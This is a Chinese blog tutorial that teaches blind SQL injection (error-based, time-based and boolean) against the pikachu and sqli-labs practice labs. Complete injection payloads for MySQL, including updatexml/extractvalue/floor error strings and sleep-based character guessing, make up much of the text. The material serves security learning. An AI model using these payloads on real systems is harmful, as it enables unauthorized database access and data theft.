SQL注入|盲注篇~

已于 2022-04-13 09:36:17 修改
阅读量929 收藏 4
点赞数 1
分类专栏: SQL注入篇 文章标签: sql 盲注 渗透测试 网络安全
于 2021-11-07 00:19:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45951067/article/details/121177120
版权

目录


盲注,顾名思义,就是注入时不能像其他注入时直接能看到返回值,但我们可以通过其他的方法进行判断:下面我将逐一介绍报错回显、时间盲注和布尔盲注。

盲注分为三类:

参考:
like ‘ro%’ #判断ro或ro… .是否成立
regexp ‘^abc[a-z]’ #匹配abc及abc…等
if(条件,5,0) #条件成立返回5反之返回0
sleep(5) #sQI语句延时执行5秒
mid(a,b,c) #从位置b开始,截取a字符串的c位
substr(a,b,c) #从b位置开始,截取字符串a的c长度 left(database(),1),database() #left(a,b)从左侧截取a的前b位 length(database())=8 #判断数据库database ()名的长度
ord=ascii ascii(x)=97 #判断x的asci i码是否等于97

1.举例SQL盲注-报错回显:

floor,updatexml,extractvalue

floor

and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);

pikachu insert#

username=x' or(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e)))
from information_schema.tableslimit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
or '&password=xiaodi&sex=%E7%94%B7&phonenum=13878787788&email=wuhan&add=hubei&submit=submit

解释一下这里出现的username=x'
因为在查询中使用了如下sql
insert into member(username,pw) values(‘xiaodi' order by 1’,md5(‘123’))
注:xiaodi后面的点是自己注入的,让它报错。
所以在实质测试中,应该把代码写在username=xiaodi’的后面
在这里插入图片描述

username=x' or updatexml(1,concat(0x7e,(version())),0) or
'&password=xiaodi&sex=%E7%94%B7&phonenum=13878787788&email=wuhan&add=hubei&submit=submit

username=x' or extractvalue(1,concat(0x7e,database())) or
'&password=xiaodi&sex=%E7%94%B7&phonenum=13878787788&email=wuhan&add=hubei&submit=submit

pikachu update#

在这里插入图片描述
上图是关于下面的注入写在哪个位置,只要有输入框的地方都能进行注入,但是submit这个提交按钮后面不能进行注入,还有在数字后面注入,数字可能不会加单引号,所以注入时按照情况判断是否加上单引号

sex=%E7%94%B7&phonenum=13878787788&add=hubeNicky' or (select 1 from(select count(*),concat( floor(rand(0)*2),0x7e,(database()),0x7e)x from information_schema.character_sets group by x)a) or '&email=wuhan&submit=submit 

sex=%E7%94%B7&phonenum=13878787788&add=hubeNicky' or updatexml(1,concat(0x7e,(version())),0) or '&email=wuhan&submit=submit

这里放一张实际运用的截图
在这里插入图片描述

sex=%E7%94%B7&phonenum=13878787788&add=Nicky' or extractvalue(1,concat(0x7e,database())) or '&email=wuhan&submit=submit

pikachu delete#

/pikachu/vul/sqli/sqli_del.php?id=56+or+(select+1+from(select+count(*),concat(floor(rand(0)*2),0x7e,(database()),0x7e)x+from+information_schema.character_sets+group+by+x)a)

pikachu/vul/sqli/sqli_del.php?id=56+or+updatexml+(1,concat(0x7e,database()),0)

/pikachu/vul/sqli/sqli_del.php?id=56+or+extractvalue(1,concat(0x7e,database()))

2.举例SQL盲注-延时判断:

if,sleep
sleep可以控制返回数据的时间,例如sleep(5)表示5秒后才返回查询结果

select * from users where id=1 and sleep(5);

if,三目运算

select if(database()="a",123,456);  #如果database为a则返回123,反之返回456

结合写法:
判断数据库名是否等于abc,等于则5秒后返回结果,不等于则0秒返回结果

select * from users where id="1" and sleep(if (database()="abc",5,0));

实战sqlilabs延时盲注:

查询数据库名是否为security

http://192.168.56.217:8080/sqlilabs/Less-2/?id=1 and sleep(if(database()="security",0,5))

配合length判断数据库长度:
判断数据库名长度是否为8

192.168.56.217:8080/sqlilabs/Less-2/?id=1 and sleep(if(length(database())=8,0,5))

ascii()、mid(a,b,c)都是比较常用的
一般来说,推荐使用ascii的写法(ascii码表),也方便编程时采用for循环0-127跑一遍测值
判断数据库名第一个值是否为s开头

http://192.168.56.217:8080/sqlilabs/Less-2/?id=1 and sleep(if(ascii(mid(database(),1,1))=115,0,5))

综合运用举例:
判断第一排第一列的表名首字母是否为m,其中limit x,y表示第x行开始,查y行的数据【limit】

select * from users where id =1 and if(ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=109,sleep(3),sleep(0));

3.举例SQL盲注-逻辑判断(布尔):

regexp,like,ascii,left,ord,mid
判断database从左边第一位开始,到第二位的字符串是否为se

http://192.168.56.217:8080/sqlilabs/Less-2/?id=1 and left(database(),2)='se'

补充:12种报错注入+万能语句:
https://www.jianshu.com/p/bc35f8dd4f7c
其他推荐文章:
https://www.jianshu.com/p/fcae21926e5c

向阳-Y.
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL注入之基于布尔的盲注详解
09-10
首先说明的盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入盲注一般分为布尔盲注和基于时间的盲注。这文章主要讲解的是基于布尔的盲注。下面来一起看看吧。
SQL注入之布尔盲注漏洞实战
weixin_44255593的博客
01-17 461
SQL注入之布尔盲注漏洞实战 实训目标 1、掌握SQL注入原理; 2、了解MySQL的数据结构; 3、了解布尔盲注相关语句; 解题方向 1、通过布尔盲注得到后台账号,从而获得key。 经过测试,确定注入点在维护界面的URL链接的id参数中,但是没有报错回显,故而要通过盲注来进行判断。 手工注入: 利用布尔盲注,来进行爆库: 首先是爆数据库名: payload1(布尔盲注):?id=1 orif(ascii(substr(database(),1,1))>1,1,0),该语句表示如果当前数据库首字母AS
SQL盲注(延时注入)
JKding123的博客
04-02 1万+
思路: *判断是否存在注入,注入是字符型还是数字型 *猜解当前数据库名 *猜解数据库表名 *猜解字段名 *猜解数据 1判断注入类型 playload result 1’ and sleep(5) # 延迟 1 and sleep(5)# 没有延迟 存在字符型注入 2猜解当前数据库名 2.1猜解数据库名的长度: playload result 1’ and i...
SQL注入实战
11-20
安全大神冰河亲自制作SQL注入入门级案例,非常适合初学者研究实践SQL注入,更好的提升自身对SQL 漏洞的注入能力和对数据库安全的认识。
SQL注入漏洞-04】布尔盲注靶场实战
cc
02-03 6589
当我们改变前端页面传输给后台sql参数时,页面没有显示相应内容也没有显示报错信息时,不能使用联合查询注入和报错注入,这时我们可以考虑是否为基于布尔的盲注。 利用页面返回的布尔类型状态,正常或者不正常; 我们输入的语句让页面呈现出两种状态,相当于true和false,根据这两种状态可以判断我们输入的语句是否查询成功。布尔盲注就是根据这两种状态,来反推我们输入的条件是真还是假。以sqli-labs-masterless-8关为例
SQL注入进阶:掌握布尔盲注和延时注入攻击技巧
weixin_43263566的博客
01-21 3715
SQL注入 - 布尔盲注及延时注入
SQL 盲注 实验
m0_63645854的博客
04-10 345
通过手工 SQL 盲注分别完成 DVWA 的 Low,Medium,High 级别的 SQL 盲注实验。在文本框输入1' and 1=2#,不能正常访问数据,注入点为字符型。第一个字符为d,按照上一步的方法,逐个猜解出整个数据库名:dvwa。拦截数据包后,第一个数据包正常放行,修改第二个数据包,在。DVWA 的 Medium 级别的 SQL 盲注实验。按照上一步的方法,逐个猜解出整个数据库名:dvwa。按照上一步的方法,逐个猜解出整个数据库名:dvwa。(4)确认当前数据库名的第一个字符。
网络安全必学SQL注入
kali_Ma的博客
11-04 7246
如果使用参数化查询,则在SQL语句中使用占位符表示需在运行时确定的参数值。当找到某个变量关键词有 SQL 注入风险时,可以再根据调用链找到该存在注入风险的业务逻辑代码,查看参数来源是否安全、是否有配置SQL危险参数过滤的过滤器,最终确认是否存在SQL注入。修改SQL语句之后,程序停止报错,但是却引入了SQL语句拼接的问题,如果没有对用户输入的内容做过滤,势必会产生SQL注入漏洞。至此,整个功能流程结束,在我们跟进的过程中,代码中无任何过滤语句,获取参数值,调用update方法更新,更新成功后返回结果。
SQL注入-05】布尔盲注案例
m0_64378913的博客
04-26 1668
目录1 概述2 操作环境3 操作具体步骤3.1 判断是否存在注入点及注入的类型3.2 测试数据库库名长度3.3 逐个测试数据库库名的字符3.4 测试该数据库中所有表名3.5 测试users表中的所有字段名3.6 测试敏感字段的字段内容4 总结参考文章 1 概述 当改变浏览器传给后台SQL的参数后,浏览器没有显示对应内容也没有显示报错信息时,无法使用union联合查询注入与报错注入,这时候可以试试看能否使用布尔注入。具体参考《【SQL注入-02】SQL注入点的简单判断》。 布尔盲注:一般情况下,当带入参数为真
SQL注入2——盲注(重学)
qq_52263650的博客
11-07 3718
SQL注入2——布尔型盲注(重学)
SQL注入(+盲注).txt
10-13
SQL注入(+盲注).txt
31-31.渗透测试SQL注入盲注
最新发布
05-10
渗透测试SQL注入盲注
网络安全-实验七-SQL注入-盲注+sqlmap使用.docx
11-10
仅仅为了大家更好的学习!
SQL注入技巧-盲注暴库详细技巧及实例
10-11
个人通过拜读各位前辈们的博文以及大量的ctf题目训练,结合挖洞经验整理的几点sql常用的盲注技巧,结合具体的sql指令加深理解,针对常用的防护技术,总结了几种通用的绕过技巧
sql盲注
weixin_44720762的博客
04-14 6709
在这博客中我尝试着去学习和简单的介绍盲注。 那在开始之前,当然要简单的介绍一下什么是盲注。 之前我们有了解过,根据我们构造的payload的不同,后台数据库会返回错误提示,这给构造闭合语句的人提供了便利,但事实上,编写程序的安全人员并不会不知道这一点。为了解决这一安全问题,除了在后台设置相应的语句判断机制外,不提供对应的错误返回提示,或无论在什么情况下都提供相同的错误返回提示确实是一种降低渗透...
渗透测试技术----常见web漏洞--SQL盲注攻击原理及防御
wwl012345的博客
08-19 3234
一、SQL盲注攻击介绍 1.SQL盲注简介 盲注是在SQL注入攻击过程中,服务器关闭了错误回显,我们单纯通过服务器返回的简单内容的变化来判断服务器是否存在注入。 2.SQL盲注的方法 (boolean-based)boolean型注入:通过页面的返回内容是否正确来验证是否存在着注入 (time-based)时间型注入:通过SQL语句的处理时间的不同来判断是否存在注入,时间型注入可以使用be...
渗透测试——sql注入进阶/基于时间的盲注/一看就会/
ChenD的学习笔记
10-06 1677
基于时间的盲注
SQL盲注(原理概述、分类)
热门推荐
小赵同学的博客
12-29 2万+
盲注原理 盲注的分类 盲注常用函数 盲注的利用方法 一、SQL盲注概述 1.如果数据库运行返回结果时只反馈对错不会返回数据库中的信息 此时可以采用逻辑判断是否正确的盲注来获取信息。 2.盲注是不能通过直接显示的途径来获取数据库数据的方法。 盲注可以分为三类: 布尔盲注 时间盲注 报错型盲注 1、布尔盲注 盲注查询是不需要返回结果的,仅判断语句是否正常执行即可,所以其返回可以看到一个布尔值,正常显示为true,报错或者是其他不正常显示为False 查询语句: SELECT userid FROM ne
SQL注入(盲注)
a12332251的博客
12-07 899
SQL
sql注入union盲注
07-28
回答: SQL注入盲注可以分为三类:布尔盲注、延时盲注和报错盲注。其中,布尔盲注是一种通过构造逻辑表达式的SQL语句来判断数据的具体内容的盲注方式。在布尔盲注中,页面在执行SQL语句后,只显示两种结果,通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

向阳-Y.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值